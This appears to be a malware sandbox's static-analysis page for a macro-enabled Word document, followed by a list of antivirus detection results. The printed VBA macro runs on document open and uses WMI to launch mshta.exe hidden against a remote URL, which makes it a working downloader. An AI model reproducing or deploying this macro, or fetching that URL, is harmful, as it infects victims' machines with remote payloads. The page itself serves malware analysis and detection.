Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub AutoOpen() Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2") Set objStartup = objWMIService.get("Win32_" & "Process" & "Startup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process") objProcess.Create "C:\Windows\System32\mshta.exe https://service-7pxel2bo-1304343953.gz.apigw.tencentcs.com/picmage", Null, objConfig, intProcessId End Sub

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub AutoOpen() Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create "C:\Windows\System32\mshta.exe https://service-7pxel2bo-1304343953.gz.apigw.tencentcs.com/picmage", Null, objConfig, intProcessId End Sub

_rels/PK

word/_rels/PK

docProps/PK

word/vbaProject.bin

"ukEv~+

Uc)Y4{r

ND+a%5

{?JctEZ}2

word/PK

word/theme/PK

[Content_Types].xml

/L[E'9

_rels/.rels

word/_rels/document.xml.rels

X=c+(\

word/document.xml

word/_rels/vbaProject.bin.relsl

-\Ya;>>

word/theme/theme1.xml

[7I"&h

!9DCm5-

,+d*H

JU[{9A

word/vbaData.xml

B4x^<|

3MnCL[

KnDd/j

word/settings.xml

D9N2N:y

uNOM-2

docProps/app.xml

word/styles.xml

""m\m;3

<W*X{O

e*$cV+

![jD;fK

PzZ1xa

*[VE4a

docProps/core.xml

word/fontTable.xml

word/webSettings.xml

f\US}d

,y0|yh}

_rels/

word/_rels/

docProps/

word/vbaProject.bin

word/theme/

[Content_Types].xmlPK

_rels/.relsPK

word/_rels/document.xml.relsPK

word/document.xmlPK

word/_rels/vbaProject.bin.relsPK

word/theme/theme1.xmlPK

word/vbaData.xmlPK

word/settings.xmlPK

docProps/app.xmlPK

word/styles.xmlPK

docProps/core.xmlPK

word/fontTable.xmlPK

word/webSettings.xmlPK

Antivirus	Signature
Bkav	Clean
Elastic	malicious (high confidence)
DrWeb	Clean
MicroWorld-eScan	VB.Heur.EmoDldr.32.8881F5CB.Gen
FireEye	VB.Heur.EmoDldr.32.8881F5CB.Gen
CAT-QuickHeal	Clean
McAfee	Clean
Malwarebytes	Clean
VIPRE	Clean
AegisLab	Clean
Sangfor	Malware.Generic-Macro.Save.2c7b01cb
Trustlook	Clean
BitDefender	VB.Heur.EmoDldr.32.8881F5CB.Gen
K7GW	Clean
K7AntiVirus	Clean
BitDefenderTheta	Clean
Cyren	PP97M/Downldr.CG.gen!Eldorado
Symantec	CL.Downloader!gen87
TotalDefense	Clean
TrendMicro-HouseCall	Clean
Avast	VBA:Downloader-DXY [Trj]
ClamAV	Clean
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
Alibaba	Clean
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot	Clean
Rising	Clean
Ad-Aware	VB.Heur.EmoDldr.32.8881F5CB.Gen
TACHYON	Suspicious/WOX.Obfus.Gen.6
Emsisoft	VB.Heur.EmoDldr.32.8881F5CB.Gen (B)
Comodo	Clean
F-Secure	Heuristic.HEUR/Macro.Downloader.MROF.Gen
Baidu	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	BehavesLike.Downloader.lc
CMC	Clean
Sophos	Clean
SentinelOne	Static AI - Suspicious OPENXML
GData	VB.Heur.EmoDldr.32.8881F5CB.Gen
Jiangmin	Clean
Avira	HEUR/Macro.Downloader.MROF.Gen
Antiy-AVL	Clean
Kingsoft	Clean
Microsoft	Clean
Gridinsoft	Clean
Arcabit	VB.Heur.EmoDldr.32.8881F5CB.Gen
SUPERAntiSpyware	Clean
ZoneAlarm	HEUR:Trojan.Win32.Generic
Avast-Mobile	Clean
Cynet	Malicious (score: 85)
AhnLab-V3	VBA/Downloader.S2
VBA32	Clean
MAX	malware (ai score=81)
Zoner	Clean
ESET-NOD32	VBA/TrojanDownloader.Agent.NZX
Tencent	Clean
Yandex	Clean
Ikarus	Clean
MaxSecure	Clean
Fortinet	WM/Agent.D73A!tr
AVG	VBA:Downloader-DXY [Trj]
Panda	Clean
Qihoo-360	Clean

Antivirus

Signature

Bkav

Clean

Elastic

malicious (high confidence)

DrWeb

Clean

MicroWorld-eScan

VB.Heur.EmoDldr.32.8881F5CB.Gen

FireEye

VB.Heur.EmoDldr.32.8881F5CB.Gen

CAT-QuickHeal

Clean

McAfee

Clean

Malwarebytes

Clean

VIPRE

Clean

AegisLab

Clean

Sangfor

Malware.Generic-Macro.Save.2c7b01cb

Trustlook

Clean

BitDefender

VB.Heur.EmoDldr.32.8881F5CB.Gen

K7GW

Clean

K7AntiVirus

Clean

BitDefenderTheta

Clean

Cyren

PP97M/Downldr.CG.gen!Eldorado

Symantec

CL.Downloader!gen87

TotalDefense

Clean

TrendMicro-HouseCall

Clean

Avast

VBA:Downloader-DXY [Trj]

ClamAV

Clean

Kaspersky

HEUR:Trojan-Downloader.Script.Generic

Alibaba

Clean

NANO-Antivirus

Trojan.Ole2.Vbs-heuristic.druvzi

ViRobot

Clean

Rising

Clean

Ad-Aware

VB.Heur.EmoDldr.32.8881F5CB.Gen

TACHYON

Suspicious/WOX.Obfus.Gen.6

Emsisoft

VB.Heur.EmoDldr.32.8881F5CB.Gen (B)

Comodo

Clean

F-Secure

Heuristic.HEUR/Macro.Downloader.MROF.Gen

Baidu

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

BehavesLike.Downloader.lc

CMC

Clean

Sophos

Clean

SentinelOne

Static AI - Suspicious OPENXML

GData

VB.Heur.EmoDldr.32.8881F5CB.Gen

Jiangmin

Clean

Avira

HEUR/Macro.Downloader.MROF.Gen

Antiy-AVL

Clean

Kingsoft

Clean

Microsoft

Clean

Gridinsoft

Clean

Arcabit

VB.Heur.EmoDldr.32.8881F5CB.Gen

SUPERAntiSpyware

Clean

ZoneAlarm

HEUR:Trojan.Win32.Generic

Avast-Mobile

Clean

Cynet

Malicious (score: 85)

AhnLab-V3

VBA/Downloader.S2

VBA32

Clean

MAX

malware (ai score=81)

Zoner

Clean

ESET-NOD32

VBA/TrojanDownloader.Agent.NZX

Tencent

Clean

Yandex

Clean

Ikarus

Clean

MaxSecure

Clean

Fortinet

WM/Agent.D73A!tr

AVG

VBA:Downloader-DXY [Trj]

Panda

Clean

Qihoo-360

Clean

Static Analysis

Original

Deobfuscated